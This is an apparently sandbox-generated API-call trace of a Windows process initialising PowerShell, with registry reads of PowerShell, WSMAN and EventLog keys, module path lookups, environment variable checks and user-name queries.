	[0672.820] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x31c) returned 0x0
	[0672.820] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0672.820] CoTaskMemAlloc (cb=0x5a) returned 0x1b3114a0
	[0672.820] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b3114a0, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0672.820] CoTaskMemFree (pv=0x1b3114a0) 
	[0672.820] RegCloseKey (hKey=0x31c) returned 0x0
	[0672.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0672.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0672.823] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x263efbdc, Data2=0x317b, Data3=0x4234, Data4=([0]=0xbf, [1]=0x15, [2]=0x98, [3]=0xd, [4]=0xd2, [5]=0x1b, [6]=0xf2, [7]=0x66))) returned 0x0
	[0672.824] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x804fd172, Data2=0x2281, Data3=0x4a28, Data4=([0]=0xae, [1]=0x67, [2]=0x92, [3]=0x5e, [4]=0x17, [5]=0x3f, [6]=0xee, [7]=0xe))) returned 0x0
	[0672.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0672.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0672.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0672.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0674.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0674.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0674.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0674.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0674.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0674.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0674.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0674.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0675.736] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.736] CoTaskMemFree (pv=0x2edb20) 
	[0675.736] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.736] CoTaskMemFree (pv=0x2edb20) 
	[0675.737] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.737] CoTaskMemFree (pv=0x2edb20) 
	[0675.737] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.737] CoTaskMemFree (pv=0x2edb20) 
	[0675.740] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.740] CoTaskMemFree (pv=0x2edb20) 
	[0675.741] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.741] CoTaskMemFree (pv=0x2edb20) 
	[0675.741] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0675.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.741] CoTaskMemFree (pv=0x2edb20) 
	[0675.746] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6f8 | out: phkResult=0x10d6f8*=0x31c) returned 0x0
	[0675.751] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d5fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d5f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0675.751] CoTaskMemFree (pv=0x0) 
	[0675.752] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0675.752] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x2921e0, lpcchValueName=0x10d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0675.752] CoTaskMemFree (pv=0x2921e0) 
	[0675.752] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0675.752] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x2921e0, lpcchValueName=0x10d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0675.752] CoTaskMemFree (pv=0x2921e0) 
	[0675.752] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0675.752] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x2921e0, lpcchValueName=0x10d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0675.752] CoTaskMemFree (pv=0x2921e0) 
	[0675.753] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d68c, lpData=0x0, lpcbData=0x10d688*=0x0 | out: lpType=0x10d68c*=0x1, lpData=0x0, lpcbData=0x10d688*=0x8) returned 0x0
	[0675.753] CoTaskMemAlloc (cb=0xc) returned 0x30a480
	[0675.753] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d65c, lpData=0x30a480, lpcbData=0x10d658*=0x8 | out: lpType=0x10d65c*=0x1, lpData="2.0", lpcbData=0x10d658*=0x8) returned 0x0
	[0675.753] CoTaskMemFree (pv=0x30a480) 
	[0677.587] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d648 | out: phkResult=0x10d648*=0x2f4) returned 0x0
	[0677.588] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d54c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d548*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.588] CoTaskMemFree (pv=0x0) 
	[0677.588] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.588] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x0, lpValueName=0x2921e0, lpcchValueName=0x10d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0677.588] CoTaskMemFree (pv=0x2921e0) 
	[0677.588] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.588] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x1, lpValueName=0x2921e0, lpcchValueName=0x10d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0677.588] CoTaskMemFree (pv=0x2921e0) 
	[0677.588] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.588] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x2, lpValueName=0x2921e0, lpcchValueName=0x10d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0677.588] CoTaskMemFree (pv=0x2921e0) 
	[0677.588] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d5dc, lpData=0x0, lpcbData=0x10d5d8*=0x0 | out: lpType=0x10d5dc*=0x1, lpData=0x0, lpcbData=0x10d5d8*=0x8) returned 0x0
	[0677.588] CoTaskMemAlloc (cb=0xc) returned 0x30a5e0
	[0677.589] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d5ac, lpData=0x30a5e0, lpcbData=0x10d5a8*=0x8 | out: lpType=0x10d5ac*=0x1, lpData="2.0", lpcbData=0x10d5a8*=0x8) returned 0x0
	[0677.589] CoTaskMemFree (pv=0x30a5e0) 
	[0677.589] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0677.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0677.590] CoTaskMemFree (pv=0x2edb20) 
	[0677.594] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0677.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0677.594] CoTaskMemFree (pv=0x2edb20) 
	[0677.600] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d678 | out: phkResult=0x10d678*=0x2f8) returned 0x0
	[0677.605] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d5ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d5e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d5ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d5e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.605] CoTaskMemFree (pv=0x0) 
	[0677.606] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.606] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.606] CoTaskMemFree (pv=0x2921e0) 
	[0677.606] CoTaskMemFree (pv=0x0) 
	[0677.606] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.606] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.606] CoTaskMemFree (pv=0x2921e0) 
	[0677.606] CoTaskMemFree (pv=0x0) 
	[0677.606] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.607] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.607] CoTaskMemFree (pv=0x2921e0) 
	[0677.607] CoTaskMemFree (pv=0x0) 
	[0677.607] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.607] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.607] CoTaskMemFree (pv=0x2921e0) 
	[0677.607] CoTaskMemFree (pv=0x0) 
	[0677.607] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.607] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.607] CoTaskMemFree (pv=0x2921e0) 
	[0677.607] CoTaskMemFree (pv=0x0) 
	[0677.607] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.607] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.607] CoTaskMemFree (pv=0x2921e0) 
	[0677.607] CoTaskMemFree (pv=0x0) 
	[0677.607] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.608] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.608] CoTaskMemFree (pv=0x2921e0) 
	[0677.608] CoTaskMemFree (pv=0x0) 
	[0677.608] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.608] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.608] CoTaskMemFree (pv=0x2921e0) 
	[0677.608] CoTaskMemFree (pv=0x0) 
	[0677.608] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0677.608] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x2921e0, lpcchName=0x10d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0677.608] CoTaskMemFree (pv=0x2921e0) 
	[0677.608] CoTaskMemFree (pv=0x0) 
	[0677.608] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x2fc) returned 0x0
	[0677.608] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.608] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x314) returned 0x0
	[0677.609] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.609] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x320) returned 0x0
	[0677.609] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.609] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x324) returned 0x0
	[0677.609] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.609] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x328) returned 0x0
	[0677.609] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.609] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x32c) returned 0x0
	[0677.610] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.610] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x330) returned 0x0
	[0677.610] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.610] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x334) returned 0x0
	[0677.610] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x0) returned 0x2
	[0677.610] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x338) returned 0x0
	[0677.610] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x33c) returned 0x0
	[0677.610] RegCloseKey (hKey=0x33c) returned 0x0
	[0677.611] RegCloseKey (hKey=0x2f8) returned 0x0
	[0677.612] RegCloseKey (hKey=0x338) returned 0x0
	[0679.528] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0679.528] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0679.530] CoTaskMemFree (pv=0x1b345860) 
	[0679.531] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0679.531] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0679.531] CoTaskMemFree (pv=0x2921e0) 
	[0681.196] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d628 | out: phkResult=0x10d628*=0x340) returned 0x0
	[0681.196] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.196] CoTaskMemFree (pv=0x0) 
	[0681.196] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
